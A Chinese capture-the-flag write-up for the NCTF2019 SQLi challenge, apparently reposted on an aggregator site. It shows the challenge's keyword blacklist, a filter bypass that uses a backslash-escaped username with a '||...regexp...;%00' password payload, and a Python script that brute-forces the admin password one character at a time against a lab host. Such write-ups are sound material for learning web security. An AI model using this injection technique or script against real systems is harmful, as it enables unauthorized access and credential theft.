php sql中regexp,[NCTF2019]SQLi(regexp注入)

主页就一个登录框 。把sql语句显示出来了。

再进行一波信息搜集。看看robots.txt

有个hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in||-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";

If $_POST['passwd'] === admin's password,

Then you will get the flag;

拿到flag的条件是post的密码要等于admin密码。并没有对用户名做限制

过滤了很多字符串。这里select字段被过滤了。但是没关系。mysql同一张表中的字段不需要select即可查询。这里只能用盲注。盲注还分时间盲注等。这里regexp即可绕过过滤

在Mysql种%00也是注释符。但是前面必须得加；

此时执行的sql语句为

select * from users where username='\' and passwd='||1;%00'

#where username='xxxx'||1

条件为真时。就会跳转。

条件为假时。就会回到登陆页

我们可以通过regexp来一位位判断密码

由于数据库中密码数据比较多。所以存在很多的密码

得一个个试。有那么多条数据。

最后y(79)开头的那条数据。比较特殊。开头三位是you

写个脚本爆破下这条数据

import requests

from urllib import parse

import string

import time

str1 = string.ascii_letters+'_'+string.digits

url='http://9d86404e-b5c0-41ff-b8ef-f9bbf6da8e8c.node3.buuoj.cn/index.php'

flag='79'

a=parse.unquote('%00')

for i in range(50):

for i in str1:

data={"username":"\\",

"passwd":"||passwd/**/regexp/**/0x"+flag+hex(ord(i)).replace('0x','')+";"+a

}

r=requests.post(url=url,data=data)

if 'welcome.php' in r.text:

flag+=hex(ord(i)).replace('0x','')

print(flag)

break

time.sleep(0.5)

#防止429

用户名随意。密码填跑出来的密码。

因为flag条件为POST密码==admin密码即可。

总结

以上是生活随笔为你收集整理的php sql中regexp,[NCTF2019]SQLi(regexp注入)的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。